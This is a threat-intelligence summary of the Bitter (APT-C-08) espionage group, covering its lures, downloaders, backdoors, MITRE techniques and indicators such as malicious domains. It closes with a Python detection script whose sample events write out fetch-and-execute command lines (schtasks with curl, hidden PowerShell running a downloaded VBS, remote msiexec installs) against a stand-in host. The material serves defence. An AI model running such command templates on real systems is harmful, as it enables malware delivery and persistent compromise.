APT-C-08 (Bitter, 蔓灵花) Group: Revealing the Truth Behind Its Diverse Attack Vectors

APT-C-08 (aka Bitter) is an APT group linked to a South Asian government that targets regional governments, foreign institutions, universities, and the military industry to steal sensitive information. Over the past year the group expanded and refined its delivery methods, using malicious PDF, PUB, CHM, LNK, searchConnector-ms and MSI files as well as WebDAV-hosted payloads, while relying on scheduled tasks and multiple C2 domains to maintain access. #APT-C-08 #ORPCBackdoor

Keypoints

  • APT-C-08 focuses on espionage against government, academic, and military targets in and around South Asia.
  • Attackers use a wide variety of malicious document types (PDF, PUB, CHM, LNK, searchConnector-ms, PPT) as initial vectors.
  • Delivery often involves remote-hosted files (WebDAV/HTTP) and downloader scripts (VBS, PowerShell, cURL) that fetch payloads.
  • Payloads observed include wmRAT, C# backdoors, ORPCBackdoor, and several RAT families delivered via MSI or compressed archives.
  • Persistence is commonly achieved with scheduled tasks (schtasks) and abuse of Windows shortcuts and connector formats.
  • Multiple C2 domains and custom HTTP behaviors (e.g., specific headers/responses) are used to blend and maintain communications.

MITRE Techniques

  • [T1566] Phishing – Uses spear-phishing emails with malicious attachments to compromise users. (‘Uses spear-phishing emails with malicious attachments to compromise users.’)
  • [T1071] Command and Control – Utilizes multiple command-and-control domains and HTTP-based callbacks to communicate with compromised hosts. (‘Utilizes multiple command and control domains to maintain communication with compromised systems.’)
  • [T1203] Exploitation for Client Execution – Exploits document and application vulnerabilities to execute malicious code from crafted files. (‘Exploits vulnerabilities in software to execute malicious code through documents.’)
  • [T1053] Scheduled Task – Creates scheduled tasks to run downloaders or payloads regularly and maintain persistence. (‘Creates scheduled tasks to maintain access to compromised systems.’)
  • [T1041] Exfiltration Over C2 Channel – Collects and sends sensitive information back to attacker-controlled servers over established C2 channels. (‘Collects and sends sensitive information back to the attacker.’)

Indicators of Compromise

  • [Domain] Hosting/downloader URLs – adamsresearchshare.com, littlehipsononline.com, and other downloader domains (e.g., healthtipsart.com) referenced as WebDAV/HTTP hosts.
  • [File name] Downloaded or dropped files – Meeting Notice.rar, winegt.vbs, tmp.jpg (used as staged downloader), and other payload names.
  • [MSI/PE] Installer and executable samples – Leov2.2_client (MSI/PDB references), Miyav1.1_client_msi, and other RAT/MSI payloads.
  • [SearchConnector/WebDAV paths] Remote connector and DLL locations – http://healthtipsart.com/dll/Downloads/, and similar WebDAV paths used to host payloads.
  • [Command snippets] Malicious command patterns – examples using cURL, msiexec, schtasks and powershell to fetch and execute payloads (commands shown in the article), plus the additional domain demolaservices.com (with the path demolaservices.com/dxl.php).

Over the last year APT-C-08 (Bitter) has broadened its toolkit and delivery formats, moving beyond simple PDFs to include Microsoft Publisher (PUB), CHM, LNK, searchConnector-ms, PPT, and MSI-based installers. Campaigns commonly deliver tiny downloader stubs or scripted shortcuts that use cURL, PowerShell, or VBS to pull binaries from WebDAV/HTTP hosts; those binaries range from lightweight RATs (wmRAT, MiyaRat variants) to more complex backdoors such as ORPCBackdoor and C#-based implants.

The group favors operational patterns that improve stealth and persistence: scheduled tasks (schtasks) to run fetch-and-execute chains on a cadence, use of multiple C2 domains with specific HTTP responses to avoid detection, and packaging payloads inside installers or archives to bypass simple file-type filters. Observed indicators include several malicious domains and downloader paths, repeating URL templates with user/computer name insertion, and recurring command-line templates that both retrieve and launch payloads.

Defenders should prioritize user awareness for spear-phishing, block known malicious hosting domains and WebDAV paths, monitor for suspicious scheduled tasks and unusual use of msiexec/curl/powershell, and inspect shortcut/search-connector files as potential initial access points. Rapid detection of the download/execution stage and containment of C2-related network traffic will reduce the chance of sensitive data exfiltration by the group’s backdoors.
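The monitoring advice above (scheduled tasks and msiexec/curl/powershell pulling payloads from HTTP or WebDAV hosts) can be turned into simple process-creation rules. The following is an added example written for this summary, not code from the original report: it runs three such rules over constructed Sysmon-style records, and the host name payload.example and the sample command lines are invented placeholders.

```python
import re

# Constructed Sysmon-style process-creation records (parent image + command line).
# Invented for this example; they are not telemetry from the report.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "cmd": r'schtasks /create /sc minute /mo 30 /tn "WinUpdate" '
     r'/tr "curl -o %TEMP%\tmp.jpg http://payload.example/dl/tmp.jpg"'},
    {"parent": "WINWORD.EXE", "cmd": r'powershell -w hidden -c "iwr http://payload.example/winegt.vbs '
     r'-OutFile $env:TEMP\winegt.vbs; wscript $env:TEMP\winegt.vbs"'},
    {"parent": "explorer.exe", "cmd": r"msiexec /i http://payload.example/client.msi /qn"},
    {"parent": "explorer.exe", "cmd": r"msiexec /i \\payload.example@80\dll\Downloads\client.msi /qn"},
    {"parent": "svchost.exe", "cmd": r"msiexec /i C:\Users\u\Downloads\vendor.msi /qn"},
    {"parent": "explorer.exe", "cmd": r"schtasks /query /fo LIST"},
]

# HTTP(S) URL, or a WebDAV UNC path such as \\host@80\share or \\host@SSL@443\share.
REMOTE_SRC = re.compile(r"https?://\S+|\\\\[\w.-]+@(?:SSL@)?\d+\\\S*", re.I)
# Downloader stages named in the report: cURL, PowerShell, VBS (run via wscript/cscript).
FETCH_TOOLS = {"curl", "powershell", "pwsh", "wscript", "cscript"}
# Handlers for the lure formats in the report: Office (incl. PUB/PPT), CHM (hh.exe),
# and LNK / searchConnector-ms files, which are opened through explorer.exe.
DOC_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "mspub.exe", "hh.exe", "explorer.exe"}

def launched_image(cmd):
    """Bare lower-case image name of the process the command line starts (no path, no .exe)."""
    tok = cmd.strip().split()[0].strip('"')
    return tok.rsplit("\\", 1)[-1].lower().removesuffix(".exe")

def classify(event):
    """Return the names of the fetch-and-execute rules this event matches."""
    cmd, parent = event["cmd"], event["parent"].lower()
    low, remote, hits = cmd.lower(), REMOTE_SRC.search(cmd), []
    # Rule 1: scheduled task created with an action that pulls a payload from a remote host.
    if re.search(r"\bschtasks(\.exe)?\b.*/create\b", low) and remote \
            and any(t in low for t in FETCH_TOOLS | {"msiexec"}):
        hits.append("schtasks_remote_fetch")
    # Rule 2: msiexec installing straight from an HTTP URL or WebDAV path.
    if re.search(r"\bmsiexec(\.exe)?\b.*\s/i\s", low) and remote:
        hits.append("msiexec_remote_install")
    # Rule 3: a document/shortcut handler spawning a download tool with a remote source.
    if parent in DOC_PARENTS and launched_image(cmd) in FETCH_TOOLS and remote:
        hits.append("doc_handler_remote_fetch")
    return hits

def scan(events):
    """Flatten matches into (rule, command line) pairs for triage."""
    return [(rule, e["cmd"]) for e in events for rule in classify(e)]
```

Running `scan(SAMPLE_EVENTS)` flags the first four records and ignores the local MSI install and the `schtasks /query`, which is the signal-to-noise split the rules are meant to give.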

Read more: https://mp.weixin.qq.com/s/pvm0QUAMS0U5dIge1ImcCQ